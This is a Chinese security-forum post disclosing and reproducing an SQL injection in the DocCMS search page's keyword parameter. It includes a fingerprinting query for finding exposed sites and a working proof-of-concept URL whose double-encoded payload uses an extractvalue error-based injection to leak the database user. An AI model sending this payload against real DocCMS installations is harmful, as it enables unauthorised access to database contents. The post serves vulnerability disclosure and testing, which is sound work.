问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
DocCMS keyword SQL注入漏洞
# DocCMS keyword SQL注入漏洞 ## 漏洞描述 DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 ## 漏洞影响 DocCMS ## 网络测绘 app="Doccms"...
DocCMS keyword SQL注入漏洞 ====================== 漏洞描述 ---- DocCMS keyword参数存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 漏洞影响 ---- DocCMS 网络测绘 ---- app="Doccms" 漏洞复现 ---- CMS官网 ![img](https://shs3.b.qianxin.com/butian_public/f3109505b04ed9e4a69f9b60db1f6865b84d2151afc55.jpg) 验证POC ```plain /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 ``` ![img](https://shs3.b.qianxin.com/butian_public/f259054bb874c41d52b3e1d63f18c30683a0bf906877c.jpg) 其中payload为下列语句的二次Url编码 ```plain ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))# ```
发表于 2024-07-12 18:43:30
阅读 ( 1141 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!